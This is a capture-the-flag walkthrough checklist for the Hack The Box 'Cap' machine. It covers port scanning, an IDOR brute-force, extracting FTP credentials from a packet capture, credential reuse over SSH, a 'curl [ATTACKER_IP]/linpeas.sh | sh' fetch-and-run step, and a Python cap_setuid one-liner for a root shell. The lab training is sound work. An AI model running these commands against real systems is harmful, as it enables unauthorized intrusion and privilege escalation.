HTB - Cap Walkthrough
Walkthrough checklist for the Cap machine involving IDOR, PCAP analysis, and Linux Capability exploitation.
1. Initial Scanning and Enumeration
- Identify open ports and service versions.
- Nmap Discovery
- Service & Scripts
nmap -sT 10.10.10.245 -T4 -vv
Ports found: 21 (FTP), 22 (SSH), 80 (HTTP).
nmap -sC -sV -p 21,22,80 10.10.10.245 -T4 -Pn
Identified vsftpd 3.0.3, OpenSSH 8.2p1, and Gunicorn.
2. Web Exploitation (IDOR)
Trigger a “Security Snapshot” on the dashboard.
Observe the redirection URL structure.
The browser is redirected to
/data/[id]. Initial scan redirected to/data/10.Perform IDOR testing on the
/data/endpoint.Use Burp Suite Intruder to bruteforce the ID range (e.g., 0-10).
3. Traffic Analysis
Identify a PCAP file containing sensitive data (Found in
/data/0).Analyze the PCAP file locally using Wireshark to extract credentials.
FTP credentials for user ’nathan’ were found in the plaintext application layer protocol inside the pcap.
4. Gaining a Foothold
Log into the FTP server to confirm access and locate flags.
lftp -u nathan 10.10.10.245Attempt to reuse the FTP credentials for SSH access.
ssh nathan@10.10.10.245
5. Privilege Escalation
- Transfer enumeration tools to the victim machine.
- Using SCP
- Using Python HTTP server
scp linpeas.sh nathan@10.10.10.245:/home/nathan
# Attacker
sudo python -m http.server 80
# Victim
curl [ATTACKER_IP]/linpeas.sh | sh
Analyze Linpeas output for Privilege Escalation vectors.
Locate binaries with interesting Linux Capabilities.
getcap -r / 2>/dev/null
6. Root Exploitation
Abuse the
CAP_SETUIDcapability found on the Python 3.8 binary.python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'Capture the root flag.
cat /root/root.txt